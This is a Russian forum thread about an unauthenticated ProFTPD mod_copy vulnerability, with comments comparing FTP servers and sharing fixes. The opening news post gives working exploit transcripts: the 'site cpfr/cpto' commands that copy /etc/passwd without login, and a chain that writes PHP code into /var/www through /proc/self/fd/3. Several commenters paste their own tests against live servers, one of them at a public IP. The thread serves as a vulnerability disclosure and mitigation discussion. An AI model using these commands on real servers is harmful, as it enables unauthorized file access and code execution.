The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификации"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификации"  +/
Сообщение от opennews (??) on 10-Апр-15, 09:25 
В ftp-сервере ProFTPD обнаружена (http://bugs.proftpd.org/show_bug.cgi?id=4169) опасная уязвимость, которая позволяет копировать файлы в пределах сервера без проведения аутентификации с помощью команд "site cpfr" и "site cpto". Проблема проявляется в модуле mod_copy, который позволяет выполнять команды на стадии до проведения аутентификации пользователя. Уязвимость усугубляется отсутствием возможности отключить mod_copy через файл конфигурации и наличием путей эксплуатации уязвимости, которые могут быть использованы в атаке для организации  выполнения кода на web-сервере.


В настоящий момент исправления доступны (https://github.com/proftpd/proftpd/pull/109) только в виде патча (https://github.com/proftpd/proftpd/commit/3ef395d81327558e6e...) в git-репозитории проекта. Одновременно для ProFTPD предложена реализация директивы CopyEngine, через которую можно отключить mod_copy без перекомпиляции. В настоящее время в дистрибутивах не зафиксировано обновлений пакетов с устранением проблемы. Оценить появление обновлений в дистрибутивах можно на следующих страницах: RHEL 6 (https://rhn.redhat.com/errata/rhel-server-6-errata.html), RHEL 7 (https://rhn.redhat.com/errata/rhel-server-7-errata.html), Ubuntu (http://www.ubuntu.com/usn/), Debian (https://lists.debian.org/debian-security-announce/2015/), Fedora (https://admin.fedoraproject.org/updates/F21), openSUSE (http://lists.opensuse.org/opensuse-security-announce/), SLES (https://www.suse.com/support/update/),  Slackware (http://www.slackware.com/security/list.php?l=slackware-secur...), Gentoo (http://www.gentoo.org/security/en/index.xml), CentOS (http://lists.centos.org/pipermail/centos-announce/2015-April...),  FreeBSD (http://www.vuxml.org/freebsd/).


Пример копирования файла /etc/passwd в /tmp/passwd.copy:

<font color="#461b7e">
   Trying 192.168.216.115...
   Connected to 192.168.216.115.
   Escape character is '^]'.
   220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
   site cpfr /etc/passwd
   350 File or directory exists, ready for destination name
   site cpto /tmp/passwd.copy
   250 Copy successful
</font>

Пример организации запуска кода на web-сервере:

<font color="#461b7e">
   site cpfr /etc/passwd
   350 File or directory exists, ready for destination name
   site cpto <?php phpinfo(); ?>
   550 cpto: Permission denied
   site cpfr /proc/self/fd/3
   350 File or directory exists, ready for destination name
   site cpto /var/www/test.php
   250 Copy successful
</font>

Файл test.php будет содержать данные из потока STDERR, в том числе и указанный в ошибочной команде PHP-код:


<font color="#461b7e">
   2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
   2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
   2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file
'/<?php
phpinfo(); ?>'
for copying: Permission denied
</font>


URL: http://bugs.proftpd.org/show_bug.cgi?id=4169
Новость: http://www.opennet.me/opennews/art.shtml?num=42015

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –7 +/
Сообщение от Аноним (??) on 10-Апр-15, 09:25 
Граждане, уберите ip сервера из статьи! :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +6 +/
Сообщение от adminlocalhost on 10-Апр-15, 09:34 
какой ужс засветить локальный ип...
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

9. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +4 +/
Сообщение от Нанобот (ok) on 10-Апр-15, 09:56 
> какой ужс засветить локальный ип...

там было 80.150.216.115, потом исправили

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

11. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +29 +/
Сообщение от Anonim (??) on 10-Апр-15, 10:06 
>> какой ужс засветить локальный ип...
>
> там было 80.150.216.115, потом исправили

Граждане, уберите ip сервера из комментария! :)

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

12. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от adminlocalhost on 10-Апр-15, 10:18 
его уже столько раз засветили...
и ниже даже проверяли на предмет пофикса
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

8. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +2 +/
Сообщение от Нанобот (ok) on 10-Апр-15, 09:56 
о ужас! они опубликовали ip-адрес, зная его, хакиры смогут зверски расправиться с сервером!!111
З.Ы раз убрали адрес, тогда уже и ссылку на багрепорт тоже следует убрать, а то особо прокачаные истерички смогут сходить по ней и тоже обнаружить там ip-адрес!!!111
а лучше сразу весь ихний багтрекер в добавить реестр запрещённых сайтов, за склонение к совершению преступления
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 09:33 
добавим, что данный мод появился в 1.3.4 - Slowpoke могут продолжать спать!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

40. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok) on 10-Апр-15, 18:40 
Сервак на убунте:

telnet ftp.site.ru 21
Trying 81.108.142.19...
Connected to ftp.site.ru.
Escape character is '^]'.
220 ProFTPD 1.3.4a Server (Site_RU) [81.108.142.19]
site cpfr /etc/passwd
500 'SITE CPFR' not understood
site cpto /tmp/passwd.copy
503-Bad sequence of commands
503 Bad sequence of commands

500 Invalid command: try being more creative

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от бедный буратино (ok) on 10-Апр-15, 09:34 
ftp и php - созданы друг для друга
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

84. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +1 +/
Сообщение от Аноним (??) on 12-Апр-15, 13:13 
> ftp и php - созданы друг для друга

Кто о чем, а буратино гремит бидоном :)

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от luzerz on 10-Апр-15, 09:41 
у них уже не работает(
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
   site cpto /tmp/passwd.copy
500 Invalid command: try being more creative
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от luzerz on 10-Апр-15, 09:41 
хотя не
скопипастил криво
работает
site cpto /tmp/passwd.copy
250 Copy successful
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

19. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 11:59 
фтп демон от рута работает штоль?
Зачем вообще выполнять команды до аунтификации?
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

85. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok) on 12-Апр-15, 13:44 
В /tmp любой юзер может писать.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

7. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +2 +/
Сообщение от adminlocalhost on 10-Апр-15, 09:48 
в centos из коробки без него proftpd -V | grep -i copy
в сусе он shared - cd /usr/lib64/proftpd && mv mod_copy.so{,.0} && service proftpd restart

так что живем пока, жаль только что proftpd подтверждает свою дырявость...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

51. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +2 +/
Сообщение от vlikhachev (ok) on 10-Апр-15, 20:46 
> в centos из коробки без него proftpd -V | grep -i copy
> в сусе он shared - cd /usr/lib64/proftpd && mv mod_copy.so{,.0} && service
> proftpd restart
> так что живем пока, жаль только что proftpd подтверждает свою дырявость...

В CentOS оно не так
ftp> site cpfr /etc/passwd
500 'SITE CPFR' not understood
ftp> site copy from /etc/passwd
500 'SITE COPY' not understood
ftp> site help
214-The following SITE commands are recognized (* =>'s unimplemented)
HELP
CHGRP
CHMOD
214 Direct comments to root@localhost
ftp> quit
221 Goodbye.

Где Ваша дырявость находится - в Ubuntu, что ли?

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

77. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 12-Апр-15, 07:51 
читать сообщение, перед тем как что-то писать в ответ, не пробовал?
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

10. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 09:59 
У меня Slackware-14.1. К сожалению (или счастью - не получилось ничего):
ftp> passive
Passive mode on.
ftp> dir
227 Entering Passive Mode (Hele is ftp ip address,217,234)
150 Opening ASCII mode data connection for file list
drwxr-xr-t   2 ftp      ftp          4096 Mar 10 06:58 incoming
drwxrwsr-x   7 root     wheel        4096 Jan 10 08:54 pub
-rw-r--r--   1 root     root          366 Oct 20  2009 welcome.msg
226 Transfer complete
ftp> site cpfr /etc/passwd
505 Security server forbids SITE commands. Contact admin.
ftp> quit
221 Goodbye.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 10:28 
С помощью telnet тоже не работает?
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

14. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 10:43 
Да, тоже не работает:
230-Connected to server. Logging in...
230-220 ProFTPD 1.3.4a Server (ProFTPD Default Installation) [192.168.1.2]
230-331 Anonymous login ok, send your complete email address as your password
230-230-Welcome, archive user ftp@... !
230- You are 0 from ...
230-
230- The local time is: Fri Apr 10 10:39:52 2015
230-
230- This is an experimental FTP server.  If have any unusual problems,
230- please report them via e-mail to <root@mail>.
230-
230- If you do have problems, please try using a dash (-) as the first
230- character of your password -- this will turn off the continuation
230- messages that may be confusing your FTP client.
230-
230 230 Anonymous access granted, restrictions apply
pasv
227 Entering Passive Mode (ip here,210,0)
site cpfr /etc/passwd
505 Security server forbids SITE commands. Contact admin.
quit
221 Goodbye.
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

15. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от ALex_hha (ok) on 10-Апр-15, 11:17 
С какой задницы они выдрали этот модуль? Ведь по дефолту этого модуля нет.

http://www.proftpd.org/docs/modules/index.html
http://www.proftpd.org/docs/contrib/index.html

здесь тоже не нашел.


P.S.
> ftp и php - созданы друг для друга

Кому що, а бабцi - курки :)

Мы же поняли, что ты не любишь php. Можешь выдыхать.

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

20. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –2 +/
Сообщение от бедный буратино (ok) on 10-Апр-15, 12:02 
> Кому що, а бабцi - курки :)
> Мы же поняли, что ты не любишь php. Можешь выдыхать.

увы, из песни ты не понял ничего...

а на php мне как-то фиолетово. речь идёт о конкретной культуре...

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

45. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +1 +/
Сообщение от Аноним (??) on 10-Апр-15, 20:11 
> речь идёт о конкретной культуре...

Из тебя культура так и прет. Конкретно.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

16. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Омномним on 10-Апр-15, 11:33 
Хорошо, что я на своей toy vps-ке поставил vsftpd.
(Ожидаю советов от достопочтенных анонимусов, почему я это сделал зря.)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –6 +/
Сообщение от Анонимус сапиенс on 10-Апр-15, 13:35 
Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

32. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +2 +/
Сообщение от cmp (ok) on 10-Апр-15, 14:58 
А SFTP не заменяет FTP?, на кой черт там питон
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

46. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 20:12 
> Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.

А питон там нафуа? Можно какой-нибудь webdav использовать, наконец, если загрузка файлов нужна.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

104. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Анонимус сапиенс on 21-Апр-15, 22:40 
>> Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.
> А питон там нафуа? Можно какой-нибудь webdav использовать, наконец, если загрузка файлов
> нужна.

Анонимный FTP

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

17. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 11:42 
А нефиг запихивать левые contrib-модули.
В нормальных дистрах его нет.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

18. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 11:53 
только vsftpd!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

75. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –1 +/
Сообщение от Куяврег on 12-Апр-15, 01:14 
штатный фряшный неплох
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

21. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +2 +/
Сообщение от Аноним (??) on 10-Апр-15, 12:02 
Лучше уж pureftpd.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

22. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 12:21 
Это чем позвольте поинтересоваться, лучше?
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

27. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 14:27 
Более безопасный. Фич меньше.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

28. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +1 +/
Сообщение от sage (??) on 10-Апр-15, 14:30 
чем proftpd.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

30. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 14:33 
Согласен. Pure-ftpd vs Vsftpd сравнить не могу, ибо последний не использовал.
По-моему, оба security-first designed.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

29. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 14:30 
> Это чем позвольте поинтересоваться, лучше?

http://www.cvedetails.com/product/16873/Proftpd-Proftpd.html...

http://www.cvedetails.com/vendor/2152/Pureftpd.html

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

86. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok) on 12-Апр-15, 13:50 
> Лучше уж pureftpd.

Он довольно топорный и меньше фич в нем реализовано.
Pure не умеет несколько разных публичных ftp на разных ip, например. Это может понадобиться в хостинге.

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

23. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 12:28 
Centos 5, 6, 7 не подвержены.
Debian 6 не подвержен.
Ubuntu 10.04 не подвержен.

Фикс для Ubuntu 14.04, Ubuntu 12.04, Debian 7

sed -i 's|LoadModule mod_copy.c|#LoadModule mod_copy.c|g' /etc/proftpd/modules.conf
service proftpd restart

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

24. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от BadUID on 10-Апр-15, 13:10 
вынес вперед тапками 2 модуля
mod_copy и mod_site_misc.
на FreeBSD в портах убираете в Makefile в модулях
mod_copy
в pkg-plist убираете mod_copy и mod_site_misc
сначала deinstall потом заново поставить. проверил - проблем нету
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

26. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –1 +/
Сообщение от Sw00p aka Jerom on 10-Апр-15, 14:06 
а в режиме только mod_sftp проявляется бага ?
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

78. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 12-Апр-15, 08:06 
> вынес вперед тапками 2 модуля
> mod_copy и mod_site_misc.
> на FreeBSD в портах убираете в Makefile в модулях
> mod_copy
> в pkg-plist убираете mod_copy и mod_site_misc
> сначала deinstall потом заново поставить. проверил - проблем нету

так оно и так не подвержено, нахрена эти телодвижения? модуль собирается, но не вкомпилен и не подключен по умолчанию:

#  find /usr/local/ -name 'mod_cop*'
/usr/local/libexec/proftpd/mod_copy.a
/usr/local/libexec/proftpd/mod_copy.so

# proftpd -l
Compiled-in modules:
  mod_core.c
  mod_xfer.c
  mod_auth_unix.c
  mod_auth_file.c
  mod_auth.c
  mod_ls.c
  mod_log.c
  mod_site.c
  mod_delay.c
  mod_facts.c
  mod_dso.c
  mod_ident.c
  mod_auth_pam.c
  mod_ctrls.c
  mod_lang.c

Escape character is '^]'.
220 ProFTPD 1.3.4d Server (ProFTPD Default Installation) [***]
site cpfr /etc/passwd
500 'SITE CPFR' not understood
help
214-The following commands are recognized (* =>'s unimplemented):
CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV    
EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD    
XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP    
NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*    
PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU    
APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST    
NLST    STAT    SITE    MLSD    MLST    
214 Direct comments to root@***
quit
221 Goodbye.
Connection closed by foreign host.

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

31. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –1 +/
Сообщение от Аноним (??) on 10-Апр-15, 14:52 
Кто-то ещё юзает это дырявое пoделие? Даже так, кто-то ещё юзает недoпротокол ftp как таковой?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

34. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от cmp (ok) on 10-Апр-15, 15:27 
> Даже так, кто-то ещё юзает недoпротокол
> ftp как таковой?

Да, его поддерживают почти все l2 коммутаторы.

> Кто-то ещё юзает это дырявое пoделие?

В некоторых встраиваемых прошивках оно встроенно, sshfs тоже есть, но с шифрованием канала скорость просто атас.

А на серверах, да, эпик фейл, достаточно заголовки новостей про него почитать и сравнить с аналогичными о vsftpd, странно, что redhat это недоразумение не выпилил без возможности запилить))

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

35. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 15:47 
> Да, его поддерживают почти все l2 коммутаторы.

с tftp не путай

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

60. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от cmp (ok) on 11-Апр-15, 07:25 
>> Да, его поддерживают почти все l2 коммутаторы.
> с tftp не путай

А я и не путаю))

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

47. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 20:14 
> Да, его поддерживают почти все l2 коммутаторы.

А мой кЕтайский тетрис его не поддерживает.

> В некоторых встраиваемых прошивках оно встроенно,

Так там и файлы обычно не перекидывают гигазами.

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

36. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +3 +/
Сообщение от Аноним (??) on 10-Апр-15, 16:00 
> Кто-то ещё юзает это дырявое пoделие? Даже так, кто-то ещё юзает недoпротокол
> ftp как таковой?

протокол может и не идеальный, но единственный который 10гбит/с линк утилизирует нормально. все эти ваши модные эсфытыпы и хытытыпы даже половины этой скорости не выжимают.

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

48. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Demo (??) on 10-Апр-15, 20:23 
> протокол может и не идеальный, но единственный который 10гбит/с линк утилизирует
> нормально. все эти ваши модные эсфытыпы и хытытыпы даже половины этой скорости
> не выжимают.

Пробовал по FTP передавать файлы между серверами (оба подключены 10 Гбит/с) в Далласе и Амстердаме, видел жалкие 30—100 Мегабит/с, в зависимости от величины суточного пинга. А вот когда выкинул FTP и заюзал tsunami, то да — совсем другое дело.

Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

37. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от pony on 10-Апр-15, 16:08 
у ftp очень плохи дела, когда надо передавать много мелких файлов
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

38. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от _KUL (ok) on 10-Апр-15, 16:38 
Решается разрешением многопоточности.
Дела у протокола плохи тем, что пароль в чистом виде по сети ходит при авторизации, вот это реально плохо ...
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

42. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 19:14 
http://en.wikipedia.org/wiki/FTPS
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

49. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от vlikhachev (ok) on 10-Апр-15, 20:35 
> Решается разрешением многопоточности.
> Дела у протокола плохи тем, что пароль в чистом виде по сети
> ходит при авторизации, вот это реально плохо ...

Так сделайте же анонимный вход с доверенных IP адресов, и если они работают 24/7/365 (и к тому же ProFTPD от юзера nobody работает) - вполне себе безопасно...

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

70. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –1 +/
Сообщение от _KUL (ok) on 11-Апр-15, 09:08 
Не выход - в одном броадкасте злодей может себе ип доверенный повесить и беда.
Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

89. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Anonymous1 on 12-Апр-15, 14:26 
Ну в одном broadcast-е злодей может и свой интерфейс в promiscque mode включить, либо в bridge к нему добавить dummy0 и все Ваши, даже шифрованные, пакеты кушать и (впоследствии) расшифровывать... Чуть дольше получится, но тем не менее...

Хотя несколько сомнительно - если, конечно, это белые V4 адреса приемника и получателя (обычно из существенно разных сетей), то трафик к другой сети пойдет через default GW, а не локально, либо нужно сломать саму машину с FTP и переписать на ней роутинг...  

Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

39. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от iZEN (ok) on 10-Апр-15, 17:14 
Ну, сколько можно. Пользуйтесь, scp(1).
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

41. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –3 +/
Сообщение от Администратор Сетей on 10-Апр-15, 19:03 
ФТП очень даже нормальный средство передатчи файлив, только вы неумеете им пользоватся!
ProFTPd исользую на сотнях карпораттивних серверах и за 10 лет неперывной эксплоутациы небыло замечено негативных моментов использования данного професианального ПО.

А истирить в камментах будут всегда, нато они и троли-истиричи...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 10-Апр-15, 20:09 
FTP отличный протокол. Только файрвол задолбаешься настраивать и работать будет с костылями, черти-как.
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

50. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от vlikhachev (ok) on 10-Апр-15, 20:41 
> FTP отличный протокол. Только файрвол задолбаешься настраивать и работать будет с костылями,
> черти-как.

ЭЭЭ... Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD?

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

83. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 12-Апр-15, 13:09 
> ЭЭЭ... Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD?

Мы говорим про то что этот супер-протокол или требует весьма неординарных костылей (кастомный модуль connection tracking) или имеет уйму проблем. С прокси там тоже все своеобразно.

Да и времени на установку ДВУХ соединений уходит немало. По поводу чего например заливка кучи мелочи на фтп - "обосpaтьсяужаснaх!"


Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

87. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok) on 12-Апр-15, 13:58 
>> FTP отличный протокол. Только файрвол задолбаешься настраивать и работать будет с костылями,
>> черти-как.
> ЭЭЭ... Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD?

В BSD как раз и не надо ничего предпринимать, если у вас FTP за натом: pf и ipfw сами его стейты разруливают "из коробки".
В случае iptables нужно лишь подгрузить conntrack-helper в ядро.

Не rocket sience же.

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

76. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Куяврег on 12-Апр-15, 01:17 
твоя учительница русского поседела только что

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

43. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Капитан (??) on 10-Апр-15, 19:45 
Всегда использую PureFTPd отличный сервер для FTP безопасный/функциональный.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

59. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +2 +/
Сообщение от Аноним (??) on 11-Апр-15, 01:53 
У ProFTPD такой здоровенная история уязвимостьей, что им пользуются только камикадзы.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

82. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +1 +/
Сообщение от ALex_hha (ok) on 12-Апр-15, 12:44 
> У ProFTPD такой здоровенная история уязвимостьей, что им пользуются только камикадзы.

когда нужен широкий функционал, то выбора особо то и нет. Так что приходится платить

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

91. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от а on 13-Апр-15, 12:05 
Точно, ещё несколько лет назад увидев в новостях несколько раз подряд сообщения об уязвимостях в ProFTP перешёл на vsftpd.
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

61. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Alex (??) on 11-Апр-15, 07:47 
Какая прелесть...

Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз. Только vsftpd, только хардкор.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

81. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от ALex_hha (ok) on 12-Апр-15, 12:43 
> Какая прелесть...
> Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз.
> Только vsftpd, только хардкор.

потому что у vsftpd функционала - кот наплакал, поэтому и уязвимостей находя намного меньше.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

97. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от AlexAT (ok) on 14-Апр-15, 21:22 
